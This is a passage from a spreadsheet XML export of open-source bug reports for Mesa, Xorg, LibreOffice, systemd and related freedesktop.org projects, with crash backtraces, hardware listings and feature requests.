  </si>
  <si>
    <t>[IGT] kms_flip@basic-flip-vs-wf_blank vblank interval differs from modeline</t>
  </si>
  <si>
    <t>Piglit was changed to consider stderr output as WARN and this exposed problem with kms_flip@basic-flip-vs-wf_blank test on older gens (Gens 4 to 7)
Affected testhosts: Broadwater Eagle Lake Cantiga Iron Lake Sandy Bridge Ivy Lake Haswell-R (curiously not Haswell K-CPUs)
Errors are in form:
(kms_flip:2174) WARNING: vblank interval differs from modeline! expected 16665.6us measured 16717us +- 0.000us difference 51.4us (inf sigma)
(kms_flip:2174) WARNING: vblank interval differs from modeline! expected 16665.6us measured 16717us +- 0.250us difference 51.5us (205.9 sigma)
(kms_flip:2174) WARNING: vblank interval differs from modeline! expected 16666.7us measured 16633us +- 0.250us difference 33.6us (134.4 sigma)
(kms_flip:2174) WARNING: vblank interval differs from modeline! expected 16666.7us measured 16633us +- 0.250us difference 33.6us (134.4 sigma)</t>
  </si>
  <si>
    <t>MESA-64153</t>
  </si>
  <si>
    <t>Mesa fails to build against master llvm</t>
  </si>
  <si>
    <t>LLVM: 3.3svn 02/05/13
Mesa: Master
Error:
gallivm/lp_bld_misc.cpp:71:23: fatal error: llvm/Wrap.h: No such file or directory</t>
  </si>
  <si>
    <t>TELEPATHY-36043</t>
  </si>
  <si>
    <t>Autoconf requirements too high</t>
  </si>
  <si>
    <t>telepathy-logger requires autotools 2.66 ubuntu 10.04 has autotools 2.65 and telepathy-logger appears to not require the higher. 
It causes an error with a jhbuild of gnome-shell on 10.04</t>
  </si>
  <si>
    <t>jamielennox</t>
  </si>
  <si>
    <t>LIBREOFFICE-50018</t>
  </si>
  <si>
    <t>Strg+H doesn't work</t>
  </si>
  <si>
    <t>The menu says that the key combination Strg+H should open the Search and Replace window but it does nothing at all. I always have to do it using the menu and as (in the German version) in the edit menu both search and search and replace have the same letter highlighted this is really annoying it makes EDITING a text difficult. I rated this bug major because it makes me use an other program for several tasks.</t>
  </si>
  <si>
    <t>gzernmplatz</t>
  </si>
  <si>
    <t>XORG-11985</t>
  </si>
  <si>
    <t>VGA port fail to output video on RV370 system with git driver of randr-1.2 branch</t>
  </si>
  <si>
    <t>connect DFP &amp; CRT monitor to DVI &amp; VGA port of RV370 set video output mode to 1280x1024 VGA port fail to output video in this case.
It's because registers FP_HORZ_STRETCH &amp; FP_VERT_STRETCH are not properly initialized in the driver when VGA port is controlled by CRTC1.
I suggest initialize these two registers in the function RADEONInitCrtcRegisters and set initial value by RADEONRestoreCrtcRegisters. it's actually how the driver initialize them in master branch.</t>
  </si>
  <si>
    <t>LIBREOFFICE-33191</t>
  </si>
  <si>
    <t>reference to Sun Microsystems in a desktop file</t>
  </si>
  <si>
    <t>the panel icon tip text is incorrect and not translated (to Slovak but
    perhaps also other languages).
    Observed in:
    LibO_3.3.0rc3_Linux_x86-64_install-deb_en-US.tar.gz
    LibO_3.3.0rc3_Linux_x86-64_langpack-deb_sk.tar.gz
    and Ubuntu 10.10
    The problem:
    The tip text says:
    --
    Libreoffice 3.3
    The office productivity suite compatible to the open and standardized
    ODF document format. Supported by Sun Microsystems.
    --
    Please notice the word Sun
Confirmed with the French version under Linux too.</t>
  </si>
  <si>
    <t>XORG-14432</t>
  </si>
  <si>
    <t>No-TV quirk for 17aa:201a wrong missing tv-out on Z61t</t>
  </si>
  <si>
    <t>I'm using Ubuntu developer version (hardy) on Thinkpad Z61t with Intel chipset. Some time ago I've lost ability to control TV output with xrandr.
Snippet from lspci -vvvn:
00:00.0 0600: 8086:27a0 (rev 03)
        Subsystem: 17aa:2017
        Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B-
        Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR-
        Latency: 0
        Capabilities: [e0] Vendor Specific Information
00:02.0 0300: 8086:27a2 (rev 03) (prog-if 00 [VGA controller])
        Subsystem: 17aa:201a
        Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B-
        Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR-
        Latency: 0
        Interrupt: pin A routed to IRQ 20
        Region 0: Memory at ee100000 (32-bit non-prefetchable) [size=512K]
        Region 1: I/O ports at 1800 [size=8]
        Region 2: Memory at d0000000 (32-bit prefetchable) [size=256M]
        Region 3: Memory at ee200000 (32-bit non-prefetchable) [size=256K]
        Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable-
                Address: 00000000  Data: 0000
        Capabilities: [d0] Power Management version 2
                Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
                Status: D0 PME-Enable- DSel=0 DScale=0 PME-
00:02.1 0380: 8086:27a6 (rev 03)
        Subsystem: 17aa:201a
        Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B-
        Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR-
        Region 0: Memory at ee180000 (32-bit non-prefetchable) [size=512K]
        Capabilities: [d0] Power Management version 2
                Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
                Status: D0 PME-Enable- DSel=0 DScale=0 PME-
TV-out gone missing because of this quirk:
    /* Lenovo X60s has no TV output */
    { PCI_CHIP_I945_GM 0x17aa 0x201a quirk_ignore_tv }
Let me repeat: I have Lenovo Thinkpad Z61t WITH TV-Output. This quirk should be removed or tailored to X60. It's better to show non-connected output than disable perfectly working output.
This is also https://bugs.launchpad.net/bugs/178505</t>
  </si>
  <si>
    <t>zdzichu</t>
  </si>
  <si>
    <t>LIBREOFFICE-50470</t>
  </si>
  <si>
    <t>PyUno objects not introspectable on Python 3</t>
  </si>
  <si>
    <t>In Python 2 dir(obj) on a PyUno object correctly finds its method names. In Python 3 it fails to find any names. This means that it isn't introspected e.g. for tab completion.
PyUno objects make their attributes visible via __members__ an older method for introspection that was removed for Python 3. The new standard is to define a __dir__() method returning the list of names. See documentation: http://docs.python.org/library/functions.html#dir . __dir__() works at least from Python 2.6.</t>
  </si>
  <si>
    <t>PORTLAND-7593</t>
  </si>
  <si>
    <t>xdg-screensaver doesn't recognize 'restore' command</t>
  </si>
  <si>
    <t>$ xdg-screensaver restore $WINDOWID 
xdg-screensaver: unknown command 'restore'
Try 'xdg-screensaver --help' for more information.
$ xdg-screensaver --help
xdg-screensaver â€” command line tool for controlling the screensaver
Synopsis
xdg-screensaver suspend WindowID
xdg-screensaver restore WindowID
[...]</t>
  </si>
  <si>
    <t>MESA-94442</t>
  </si>
  <si>
    <t>Add ARB_vertex_attrib_64bit support for the i965 backend</t>
  </si>
  <si>
    <t>This issue is to track progress for the implementation of ARB_vertex_attrib_64bit support for the i965 backend.
https://www.opengl.org/registry/specs/ARB/vertex_attrib_64bit.txt
This extension is already supported on softpipe and llvmpipe so the GL API is already in place. There are also piglit tests for this extension but they will be extended if needed.</t>
  </si>
  <si>
    <t>XORG-19034</t>
  </si>
  <si>
    <t>Reproducible server crash related to SD animated cursor</t>
  </si>
  <si>
    <t>When using xserver-1.5.99.3 occasionally a second cursor will appear on the screen whose position and background doesn't change after that (I'll make a screenshot the next time this happens).  When I close the client whose window this happened on the server crashes.  Backtrace below
---
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb7bca6b0 (LWP 5389)]
0x08072509 in dixLookupPrivate (privates=0xb9b0330 key=0x81f3e60) at ../../dix/privates.c:79
79	    return *key &amp;&amp; *privates &amp;&amp;
(gdb) bt
#0  0x08072509 in dixLookupPrivate (privates=0xb9b0330 key=0x81f3e60) at ../../dix/privates.c:79
#1  0x08111539 in miDCPutUpCursor (pDev=0xa1e2c28 pScreen=0xa1b3418 pCursor=0xacbb158 x=764 y=826 source=0 
    mask=16777215) at ../../mi/midispcur.c:449
#2  0x08121f2b in miSpriteRestoreCursor (pDev=0xa1e2c28 pScreen=0xa1b3418) at ../../mi/misprite.c:1025
#3  0x081223fd in miSpriteBlockHandler (i=0 blockData=0x0 pTimeout=0xbf8b6718 pReadmask=0x81f41e0)
    at ../../mi/misprite.c:525
#4  0xb7ad3e75 in ?? () from /usr/lib/xorg/modules/drivers//intel_drv.so
#5  0x081799cb in AnimCurScreenBlockHandler (screenNum=0 blockData=0x0 pTimeout=0xbf8b6718 pReadmask=0x81f41e0)
    at ../../render/animcur.c:222
#6  0x08143368 in compBlockHandler (i=0 blockData=0x0 pTimeout=0xbf8b6718 pReadmask=0x81f41e0)
    at ../../composite/compinit.c:158
#7  0x080908e8 in BlockHandler (pTimeout=0xbf8b6718 pReadmask=0x81f41e0) at ../../dix/dixutils.c:384
#8  0x0812fd74 in WaitForSomething (pClientsReady=0xa2a1060) at ../../os/WaitFor.c:215
#9  0x0808c9ee in Dispatch () at ../../dix/dispatch.c:367
#10 0x0807196d in main (argc=10 argv=0xbf8b6864 envp=0x0) at ../../dix/main.c:383</t>
  </si>
  <si>
    <t>LIBREOFFICE-66762</t>
  </si>
  <si>
    <t>Other: com.sun.star.awt.DisplayAccess removed without alternative</t>
  </si>
  <si>
    <t>as found out after ailing with Noel Gradin
the com.sun.star.awt.DisplayAccess was removed by Noel
http://cgit.freedesktop.org/libreoffice/core/commit/?id=dde234b6955a421d51d2b37e4fc3972c660146f0
but since there is no alternative to find oud the screen size of the machine where LO is runnning
the proposed solution:
otoolkit = createUnoService(com.sun.star.awt.Toolkit)
aWorkRect = otoolkit.getWorkArea()
is not working because empty values in the WorkArea
so please make
oDisplayAccess= createUnoService(com.sun.star.awt.DisplayAccess)
    oDisplayInfo = oDisplayAccess.getByIndex(0)
    aScreenArea = oDisplayInfo.ScreenArea
    iScreenW =    aScreenArea.Width
    iScreenH =    aScreenArea.Height
working again
Operating System: All
Version: 4.0.1.2 release
Last worked in: 4.0.4.2 release</t>
  </si>
  <si>
    <t>MESA-72654</t>
  </si>
  <si>
    <t>[llvmpipe] piglit arb_color_buffer_float-render GL_RGBA16F fog regression</t>
  </si>
  <si>
    <t>mesa: e84a1ab3c400f819408a7ebe01c2325cd59d94d3 (master)
$ ./bin/arb_color_buffer_float-render GL_RGBA16F fog -auto
Testing 16-bit floating-point FBO
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.stmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.stmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.ldmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.ldmxcsr
Broken module found verification continues.
155139059ba588da1161eaa692515cacdead9f4e is the first bad commit
commit 155139059ba588da1161eaa692515cacdead9f4e
Author: Zack Rusin 
Date:   Fri Dec 6 01:28:25 2013 -0500
    llvmpipe: fix blending with half-float formats
    The fact that we flush denorms to zero breaks our half-float
    conversion and blending. This patches enables denorms for
    blending. It's a little tricky due to the llvm bug that makes
    it incorrectly reorder the mxcsr intrinsics:
    http://llvm.org/bugs/show_bug.cgi?id=6393
    Signed-off-by: Zack Rusin 
    Reviewed-by: JosÃ© Fonseca 
    Reviewed-by: Roland Scheidegger 
    Signed-off-by: Zack Rusin 
:040000 040000 5564b14ae9b7870ae8f4845f2069878c0752d5bc 84eb2a43a71956a57817e373117c2e2952a058d2 M	src
bisect run success</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-103977</t>
  </si>
  <si>
    <t>Account request for Miguel A Vico</t>
  </si>
  <si>
    <t>I would want a fd.o account in preparation for hosting the generic allocator project in fd.o.
Full Name:
  Miguel Angel Vico Moya
Email address:
  mvicomoya@nvidia.com
Preferred account name:
  mvicomoya</t>
  </si>
  <si>
    <t>mvicomoya</t>
  </si>
  <si>
    <t>PKG-CONFIG-13892</t>
  </si>
  <si>
    <t>use m4_default and more pkg.m4 cosmetics</t>
  </si>
  <si>
    <t>The following patch makes some cosmetic changes to m4 macros in pkg.m4.
1) ifelse([$7] [] [this] [$7]) is the same as m4_default([$7] [this])
2) Whitespace before each m4 parameter is ignored so the`dnl' in the folowing is redundant:
  MACRO(dnl
  parameter)
3) Shell syntax does not allow empty command the `then' or `else' branch that's why you can see things like:
  if test $foo = yes then
     ifelse([$3]  : [$3])
  fi
But if the possible empty $3 is not alone there no magic is needed:
  if test $foo = yes then
     echo Oh yes!
     $3
  fi</t>
  </si>
  <si>
    <t>XORG-46346</t>
  </si>
  <si>
    <t>X server crashes very often when switching virtual desktops</t>
  </si>
  <si>
    <t>Created attachment 57322
GDB backtrace
Hello
X keeps crashing on a pretty regular basis.  It happens a lot when I switch virtual desktops in Xfce but also happens on other repaint events.  See attached logfile and gdb backtrace.  I'm running Debian with kernel 3.2.6 updated intel driver from git to commit 95391b7312.
Please let me know if you need additional info.
--Joe</t>
  </si>
  <si>
    <t>joe</t>
  </si>
  <si>
    <t>HARFBUZZ-30319</t>
  </si>
  <si>
    <t>open type init feature applied on character U+09c7 even thought it is in the middle of word</t>
  </si>
  <si>
    <t xml:space="preserve">A complete description can be found at: http://bugreports.qt.nokia.com/browse/QTBUG-13620
In Harbuuzz-indic.cpp there are two functions isLetter and isMark b0th have the same return statement 
    return FLAG(HB_GetUnicodeCharCategory(ucs)) 
The problem is that the return value is a byte (representing a boolean value) whereas the expression being evaluated is much larger. 
A more appropriate return statement would be
    return (FLAG(HB_GetUnicodeCharCategory(ucs)) </t>
  </si>
  <si>
    <t>phunter</t>
  </si>
  <si>
    <t>MESA-41756</t>
  </si>
  <si>
    <t>[wine] Alpha Prime crashes in u_upload_data</t>
  </si>
  <si>
    <t>Created attachment 52308
backtrace from gdb
The game Alpha Prime (running with Wine 1.3.30) crashes shortly after start with latest git. With 7.11 I get another crash so I'm not sure if this is a regression or not.
The backtrace from Wine is below I also attached a backtrace from gdb but I'm not sure if it's good or not.
=&gt;0 0xb7547aa0 in libc.so.6 (+0x10faa0) (0x0032fd80)
  1 0x7b33aae4 u_upload_data+0x73(upload=0x7caea288 min_out_offset=0x32fd80 size=0x1200 data=0x5d16da0 out_offset=0x7cb5ce48 outbuf=0x7cb5ce4c flushed=â•|) [/home/sa/Programming/gfx/mesa/mesa/src/gallium/auxiliary/util/u_upload_mgr.c:220] in r600_dri.so (0x0032fd80)
  2 0x7b33adce u_vbuf_upload_buffers+0x1dd(mgr=0x7cb5ccc0 min_index=0xcbf6 max_index=0xcc3d instance_count=0x1) [/home/sa/Programming/gfx/mesa/mesa/src/gallium/auxiliary/util/u_vbuf_mgr.c:575] in r600_dri.so (0x0032fd80)
  3 0x7b33bf04 u_vbuf_draw_begin+0x193(mgrb=0x7cb5ccc0 info=0xb9e98c) [/home/sa/Programming/gfx/mesa/mesa/src/gallium/auxiliary/util/u_vbuf_mgr.c:652] in r600_dri.so (0x00b9e98c)
  4 0x7b13ab1b r600_draw_vbo+0x5a(ctx=0x7ccd1908 info=0xb9e98c) [/home/sa/Programming/gfx/mesa/mesa/src/gallium/drivers/r600/r600_state_common.c:571] in r600_dri.so (0x00000003)
  5 0x7b1fd5f1 st_draw_vbo+0x330(ctx=0x7cd079a0 arrays=0x7cd54fec prims=0xb9ea20 nr_prims=0x1 ib=0xb9ea34 index_bounds_valid=0 min_index=0 max_index=0x47) [/home/sa/Programming/gfx/mesa/mesa/src/mesa/state_tracker/st_draw.c:798] in r600_dri.so (0x00000003)
  6 0x7b2b8a1e vbo_validated_drawrangeelements+0x13d(ctx=0x7cd079a0 mode=0x4 index_bounds_valid=0 start=0xffffffff end=0xffffffff count=0xc0 type=0x1403 indices=0x3a4c7b4 basevertex=0xcbf6 numInstances=0x1) [/home/sa/Programming/gfx/mesa/mesa/src/mesa/vbo/vbo_exec_array.c:860] in r600_dri.so (0x000000c0)
  7 0x7b2b8b34 vbo_exec_DrawElementsBaseVertex+0xa3(mode=0x4 count=0xc0 type=0x1403 indices=0x3a4c7b4 basevertex=0xcbf6) [/home/sa/Programming/gfx/mesa/mesa/src/mesa/vbo/vbo_exec_array.c:1040] in r600_dri.so (0x03a4c7b4)
  8 0x7ea887e4 drawPrimitive+0x11e3(device=0x171740 index_count=0xc0 StartIdx=0x53ca idxSize=0x2 idxData=0x3a42020) [/home/sa/Programming/wine-test/dlls/wined3d/drawprim.c:44] in wined3d (0x00000002)
  9 0x7ea6955b wined3d_device_draw_indexed_primitive+0xda(device=0x171740 start_idx=0x53ca index_count=0xc0) [/home/sa/Programming/wine-test/dlls/wined3d/device.c:4158] in wined3d (0x02a17b58)
  10 0x7eb72d5e IDirect3DDevice9Impl_DrawIndexedPrimitive+0xcd(iface=0x171710 PrimitiveType=D3DPT_TRIANGLELIST BaseVertexIndex=0xcbf6 MinVertexIndex=0 NumVertices=0x48 startIndex=0x53ca primCount=0x40) [/home/sa/Programming/wine-test/dlls/d3d9/device.c:1941] in d3d9 (0x000053ca)
  11 0x00451479 in alphaprime (+0x51478) (0x7eb8f100)
  12 0x7eb6c840 in d3d9 (+0xc83f) (0x7eb74440)
  13 0xe84c245c (0x895cec83)
err:mmtime:TIME_MMTimeStop Timer still active?!
err:d3d:wined3d_wndproc Window 0xc0024 is not registered with wined3d.
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: REDWOOD
-- Model: XFX Radeon HD 5670 1GB
-- Display connector: DVI
-- xf86-video-ati: 6.14.2
-- xserver: 1.11.1
-- mesa: 349e4db99e938f8ee8826b0d27e490c66a1e8356
-- drm: 2.4.26
-- kernel: 3.0</t>
  </si>
  <si>
    <t>XORG-9682</t>
  </si>
  <si>
    <t>[PATCH] Implement fbCompositeSrc_8888x0565mmx</t>
  </si>
  <si>
    <t>Soren does this look sane?</t>
  </si>
  <si>
    <t>LIBREOFFICE-85544</t>
  </si>
  <si>
    <t>Calc row highlight and right click is not immediate</t>
  </si>
  <si>
    <t>LibreOffice 4.2.6.2
Windows 7 Professional 64 Bit
Calc : Tabelle mit Spalten A - R wenn ganze Zeile markiert von R aus Richtung A mit  +  passiert bei 1. Rechtsklick auf Markierung NIE etwas erst beim 2. Rechtsklick oeffnet sich das Kontextmenue</t>
  </si>
  <si>
    <t>KA_PN</t>
  </si>
  <si>
    <t>XORG-19984</t>
  </si>
  <si>
    <t>ATI Radeon HD 4850 not supported</t>
  </si>
  <si>
    <t>I'v reported this bug on Ubuntu Jaunty (9.04) :
https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/325394
xserver-xorg-video-radeon 1:6.10.0-1ubuntu1 claim to support RV770 Radeon HD 4850/4870 (from man radeon) but in fact when xorg come up screen go white and system freeze.
kagou@agape:~$ lspci | grep VGA
02:00.0 VGA compatible controller: ATI Technologies Inc RV770 [Radeon HD 4850]
kagou@agape:~$ lspci -n | grep 0300
02:00.0 0300: 1002:9442
kagou@agape:~$</t>
  </si>
  <si>
    <t>ubuntu</t>
  </si>
  <si>
    <t>LIBREOFFICE-52125</t>
  </si>
  <si>
    <t>: libreoffice --headless should return 0 on successful conversion</t>
  </si>
  <si>
    <t>Problem description: 
After updating from 3.5.4 to 3.5.5 libreoffice --headless is now exiting with a 139 code instead of 0 as it used to. Conversion itself is apparently right and no error messages are generated.
Steps to reproduce:
libreoffice --headless -convert-to odt somedocument -outdir .
Expected behavior:
The document is converted to odt and libreoffice returns 0.
Current behavior:
The document is converted to odt and libreoffice returns 139.</t>
  </si>
  <si>
    <t>ingenit</t>
  </si>
  <si>
    <t>NICE-89849</t>
  </si>
  <si>
    <t>nice_agent_attach_recv or nice_agent_recv* required for negotiation</t>
  </si>
  <si>
    <t>After the local candidate gathering phase the user has to either:
1) attach a callback using nice_agent_attach_recv
2) keep using the nice_agent_recv* family of functions
Otherwise ICE negotation never completes.
The documentation does not explain this. Furthermore it's not intuitive or obvious that *my app* should keep reading data in order for *NiceAgent* to receive its own packets (that it handles internally and never forwards to me).
While I find this design choice confusing if it's impossible to change it let's update the docs of all relevant functions to explain this:
* nice_agent_recv
* nice_agent_recv_messages
* nice_agent_recv_nonblocking
* nice_agent_recv_messages_nonblocking
* nice_agent_attach_recv
Introducing sdp-recv-example.c that uses the nice_agent_recv* family of functions could be also useful.</t>
  </si>
  <si>
    <t>ilya.konstantinov</t>
  </si>
  <si>
    <t>ICON_THEME-69231</t>
  </si>
  <si>
    <t>hicolor</t>
  </si>
  <si>
    <t>ICON_THEME</t>
  </si>
  <si>
    <t>add 512x512 to the lookup</t>
  </si>
  <si>
    <t>The current practice is to shiip highly detailed application icons at the 256x256px size. For the more and more common dnese displays such as the one found on the Chromebook Pixel this may not be enough. 
We should add a 512x512 lookup size without breaking the existing 256x256 max size and scalable app icon shipments.</t>
  </si>
  <si>
    <t>SYSTEMD-68931</t>
  </si>
  <si>
    <t>vacuuming archived journals is broken</t>
  </si>
  <si>
    <t>An invalid filename is used in journal vacuuming code so it doesn't work. To make matters worse... if it did work it would leak file descriptors.
I've sent a patch series containing two patches to the mailing list to resolve the problems:
http://lists.freedesktop.org/archives/systemd-devel/2013-September/012984.html</t>
  </si>
  <si>
    <t>george.mccollister</t>
  </si>
  <si>
    <t>XORG-53842</t>
  </si>
  <si>
    <t>Nouveau fails to read EDID but X succeeds.</t>
  </si>
  <si>
    <t>Created attachment 65829
dmesg showing the problem with EDID
Nouveau fails to read EDID but X succeeds</t>
  </si>
  <si>
    <t>LIBREOFFICE-62670</t>
  </si>
  <si>
    <t>TABLE: Splitting a table options are mixed</t>
  </si>
  <si>
    <t>Created attachment 76942
A test file created for this purpose.
Problem description: When splitting a table and selecting no header the header is created. 
2nd or 3rd option does the job.
Steps to reproduce:
1. Create a table in a Writer document
2. Split the table selecting the 4th option (No header)
3. The new table is created with the previous header.
Current behavior:
The header is created even if I select not to. (4th option)
Expected behavior:
There should be no header.
Operating System: Ubuntu
Version: 4.0.1.2 release</t>
  </si>
  <si>
    <t>gajdipajti</t>
  </si>
  <si>
    <t>XORG-7121</t>
  </si>
  <si>
    <t>Cygwin/Xming fix an occasional repeating clipboard pasting problem</t>
  </si>
  <si>
    <t>Sometimes (every blue moon!) repeated painting of the contents of the clipboard 
into an X Window can occur in Xming (same code as Cygwin/X).
The WM_DRAWCLIPBOARD code calls SendMessage() before processing clipboard 
change. Since the SendMessage() function does not return until the receiving 
window has processed the message it's not surprising things can go wrong. The 
attached path reverses this code order in WM_DRAWCLIPBOARD and if nesting is 
detected makes a better stab at correction.
The patch applies to both the monolithic and modular cygwin trees.</t>
  </si>
  <si>
    <t>MESA-101283</t>
  </si>
  <si>
    <t>skylake: page fault accessing address 0</t>
  </si>
  <si>
    <t>The function blorp_emit_gen8_hiz_op contains a pipe control operation that has only the WriteImmediateData bit set.  It doesn't specify an address so this results in a store to address 0.
a) What is this pipe control for?  I don't see the need for it in the docs.
From what I can see the docs for 3DSTATE_WM_HZ_OP say: As this command generates an implicit rectangle SW must make sure any MMIO register writes following WM_HZ_OP must be preceded by PIPE_CONTROL with Command Streamer Stall Enable bit set.
In the code there's a following PIPECONTROL with depth_stall and depth flush bits set which corresponds to the docs in the section 'Depth Buffer Clear'.
b) How is it not a problem to emit a pipecontrol that writes to address 0?
Thanks.</t>
  </si>
  <si>
    <t>DRI-95040</t>
  </si>
  <si>
    <t>[DP] [hsw dp-mst] 2 encoders on crtc for pipe B after undock/dock</t>
  </si>
  <si>
    <t>On my dell latitude e5440 when I undock and redock I am unable to re-activate
both monitors using xrandr. I'm using linux kernel 4.4.5 and the i915
driver. Looking at dmesg I found the following trace(s):
[40604.935498] ------------[ cut here ]------------
[40604.935522] WARNING: CPU: 0 PID: 524 at
drivers/gpu/drm/i915/intel_ddi.c:772
intel_ddi_get_crtc_new_encoder+0x8d/0xa0 [i915]()
[40604.935525] 2 encoders on crtc for pipe B
[40604.935526] Modules linked in: sha256_ssse3 sha256_generic hmac
drbg ansi_cprng ctr ccm tun xt_conntrack ipt_MASQUERADE
nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4
nf_nat_ipv4 xt_addrtype iptable_filter nf_nat nf_conntrack
br_netfilter bridge stp llc dm_thin_pool dm_persistent_data
dm_bio_prison dm_bufio libcrc32c crc32c_generic loop dm_mod fuse
snd_hda_codec_hdmi arc4 snd_hda_codec_realtek snd_hda_codec_generic
iTCO_wdt iTCO_vendor_support dell_wmi sparse_keymap intel_rapl ppdev
iosf_mbi dell_laptop uvcvideo videobuf2_vmalloc dcdbas
x86_pkg_temp_thermal videobuf2_memops videobuf2_v4l2 intel_powerclamp
coretemp videobuf2_core btusb kvm_intel btrtl btbcm v4l2_common
btintel bluetooth videodev dell_smm_hwmon kvm irqbypass media
crct10dif_pclmul crc32_pclmul joydev crc32c_intel
[40604.935572] mousedev aesni_intel i915 aes_x86_64 lrw gf128mul
iwlmvm glue_helper ablk_helper cryptd mac80211 drm_kms_helper
snd_hda_intel evdev input_leds snd_hda_codec mac_hid psmouse
snd_hda_core serio_raw drm iwlwifi pcspkr snd_hwdep e1000e snd_pcm
i2c_i801 intel_gtt cfg80211 syscopyarea snd_timer sysfillrect mei_me
sysimgblt snd fb_sys_fops lpc_ich shpchp soundcore mei i2c_algo_bit
ptp thermal pps_core wmi battery tpm_tis dell_rbtn parport_pc tpm
parport dell_smo8800 rfkill fjes processor button video ac
sch_fq_codel vboxnetflt(O) vboxnetadp(O) pci_stub vboxpci(O)
vboxdrv(O) ip_tables x_tables ext4 crc16 mbcache jbd2 sr_mod cdrom
sd_mod hid_generic usbhid hid atkbd libps2 ahci libahci libata
scsi_mod sdhci_pci xhci_pci ehci_pci sdhci led_class ehci_hcd xhci_hcd
mmc_core usbcore usb_common i8042
[40604.935629] serio
[40604.935633] CPU: 0 PID: 524 Comm: Xorg Tainted: G O 4.4.5-1-ARCH #1
[40604.935635] Hardware name: Dell Inc. Latitude E5440/0C4F9T BIOS
A12 05/19/2015
[40604.935636] 0000000000000286 000000000340055a ffff88021314f970
ffffffff812cb391
[40604.935640] ffff88021314f9b8 ffffffffa0831fd0 ffff88021314f9a8
ffffffff810776e2
[40604.935642] ffff88021374b000 ffff880020070800 ffff88021374b000
ffff880214eb2a00
[40604.935645] Call Trace:
[40604.935651] [] dump_stack+0x63/0x82
[40604.935656] [] warn_slowpath_common+0x82/0xc0
[40604.935659] [] warn_slowpath_fmt+0x5c/0x80
[40604.935674] []
intel_ddi_get_crtc_new_encoder+0x8d/0xa0 [i915]
[40604.935685] [] intel_ddi_pll_select+0x41/0x1360 [i915]
[40604.935687] [] ? mutex_optimistic_spin+0x120/0x1c0
[40604.935698] [] ?
intel_plane_atomic_calc_changes+0x4d/0x6c0 [i915]
[40604.935702] [] ?
drm_plane_helper_check_update+0xdb/0x190 [drm_kms_helper]
[40604.935715] [] haswell_crtc_compute_clock+0x12/0x30 [i915]
[40604.935729] [] intel_crtc_atomic_check+0x146/0x1e0 [i915]
[40604.935733] []
drm_atomic_helper_check_planes+0x14b/0x1c0 [drm_kms_helper]
[40604.935743] [] intel_atomic_check+0x412/0x1020 [i915]
[40604.935750] [] drm_atomic_check_only+0x18e/0x590 [drm]
[40604.935754] [] ?
drm_atomic_set_crtc_for_connector+0x20/0x90 [drm]
[40604.935759] [] drm_atomic_commit+0x17/0x60 [drm]
[40604.935762] []
drm_atomic_helper_set_config+0x76/0xb0 [drm_kms_helper]
[40604.935768] []
drm_mode_set_config_internal+0x62/0x100 [drm]
[40604.935774] [] drm_mode_setcrtc+0x3d2/0x4f0 [drm]
[40604.935781] [] drm_ioctl+0x152/0x540 [drm]
[40604.935786] [] ? drm_mode_setplane+0x1b0/0x1b0 [drm]
[40604.935789] [] do_vfs_ioctl+0x298/0x480
[40604.935791] [] ? __set_task_blocked+0x41/0xa0
[40604.935793] [] ? __fget+0x77/0xb0
[40604.935795] [] SyS_ioctl+0x79/0x90
[40604.935797] [] ? SyS_rt_sigprocmask+0x8e/0xc0
[40604.935799] [] entry_SYSCALL_64_fastpath+0x12/0x6d
[40604.935801] ---[ end trace 909344e33a4c649e ]---
[40605.031135] ------------[ cut here ]------------
[40605.031163] WARNING: CPU: 0 PID: 524 at
drivers/gpu/drm/i915/intel_display.c:6442
intel_atomic_commit+0x61e/0x1430 [i915]()
[40605.031167] attached crtc is active but connector isn't
[40605.031168] Modules linked in: sha256_ssse3 sha256_generic hmac
drbg ansi_cprng ctr ccm tun xt_conntrack ipt_MASQUERADE
nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4
nf_nat_ipv4 xt_addrtype iptable_filter nf_nat nf_conntrack
br_netfilter bridge stp llc dm_thin_pool dm_persistent_data
dm_bio_prison dm_bufio libcrc32c crc32c_generic loop dm_mod fuse
snd_hda_codec_hdmi arc4 snd_hda_codec_realtek snd_hda_codec_generic
iTCO_wdt iTCO_vendor_support dell_wmi sparse_keymap intel_rapl ppdev
iosf_mbi dell_laptop uvcvideo videobuf2_vmalloc dcdbas
x86_pkg_temp_thermal videobuf2_memops videobuf2_v4l2 intel_powerclamp
coretemp videobuf2_core btusb kvm_intel btrtl btbcm v4l2_common
btintel bluetooth videodev dell_smm_hwmon kvm irqbypass media
crct10dif_pclmul crc32_pclmul joydev crc32c_intel
[40605.031201] mousedev aesni_intel i915 aes_x86_64 lrw gf128mul
iwlmvm glue_helper ablk_helper cryptd mac80211 drm_kms_helper
snd_hda_intel evdev input_leds snd_hda_codec mac_hid psmouse
snd_hda_core serio_raw drm iwlwifi pcspkr snd_hwdep e1000e snd_pcm
i2c_i801 intel_gtt cfg80211 syscopyarea snd_timer sysfillrect mei_me
sysimgblt snd fb_sys_fops lpc_ich shpchp soundcore mei i2c_algo_bit
